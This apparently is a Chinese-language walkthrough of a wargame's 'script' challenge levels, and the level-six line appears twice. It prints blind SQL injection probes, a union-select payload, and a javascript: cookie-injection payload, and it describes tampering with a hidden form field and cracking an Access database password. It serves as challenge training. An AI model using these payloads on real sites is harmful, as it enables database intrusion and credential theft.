虽然叫做脚本关,但是和脚本关系不大(个人觉得)。
脚本第六关:很水的题,javascript加密了好像是一种叫做,JSencode的方法,解密一下就可以了。
脚本第一关: 用linux指令把文件内容读出来就行了,我用的cat.
脚本第二关:告送了你数据库中的表名和字段名,简单的注入,比较懒的人可以用 啊D 跑出来,手工的话union这种方法貌似不能用。把常用的SQL语句粘贴一下
select * from 表 where id='ade7' and '1'='1'
and exists (select count(*) from sysobjects) /*MYSQL*/
and exists (select count(*) from msysobjects) /*ACCESS*/
and exists (select count(*) from 要猜的表名)
and (select count(要猜的列名) from 猜到的表名)>0
and (select count(*) from 猜到的表名)>X
and (select top 1 len(列) from 表)>X
and (select top 1 asc(mid(列,X,1)) from 表)>N
union select 1,2,3,4,5,6,7,8,9,10 from admin
脚本第三关:这个比较水,改一下一个隐藏表单的值,提交以下就可以了。
脚本第四关:这个也很水,把数据库下下来,找个解密软件把密码跑出来,好像是LW什么的,就行了。好像mdb的密码比较水,拿文件中的几位随便or几下xor几下,就能把密码闹出来。
脚本第五关:这个比较难,需要cookie注入,查询字符串构造的也比较变态,不好做中转,重点是SQL语句中关键字做表名要用大括号括起来比如[key],幸好这个注入点可以用union来爆SQL语句是这样的。
javascript:alert(document.cookie="title="+escape("1' union all select 1,key,3 from [key] where id=1 and key like '%"));
脚本第六关:很水的题,javascript加密了好像是一种叫做,JSencode的方法,解密一下就可以了。